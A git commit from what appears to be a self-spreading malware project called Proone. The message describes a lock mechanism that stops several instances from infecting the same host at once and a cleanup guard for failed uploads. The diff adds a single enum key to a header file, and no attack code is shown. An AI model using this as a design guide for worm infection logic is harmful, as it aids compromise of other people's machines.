From 73799fe772152089a6c57aa339f08426cf3eaf11 Mon Sep 17 00:00:00 2001 From: David Timber Date: Fri, 13 Aug 2021 18:22:35 +1000 Subject: Impl bne ... * Add upload lock mechanism to prevent multiple instances trying to infect the same host simultaneously * Add "upload guard". The upload guard cleans up the lock file and the upload directory in the event of upload failure * Fix bug in bne_vssh_flush_f() * prne_strzero() accepts NULL * Fix Proone: missing prne_dvault_reset() calls --- src/data.h | 1 + 1 file changed, 1 insertion(+) (limited to 'src/data.h') diff --git a/src/data.h b/src/data.h index 0056b11..87c92af 100644 --- a/src/data.h +++ b/src/data.h @@ -24,6 +24,7 @@ typedef enum { PRNE_DATA_KEY_CRED_DICT, PRNE_DATA_KEY_EXEC_NAME, PRNE_DATA_KEY_VER_MAT, + PRNE_DATA_KEY_BNE_LOCK_NAME, NB_PRNE_DATA_KEY } prne_data_key_t; -- cgit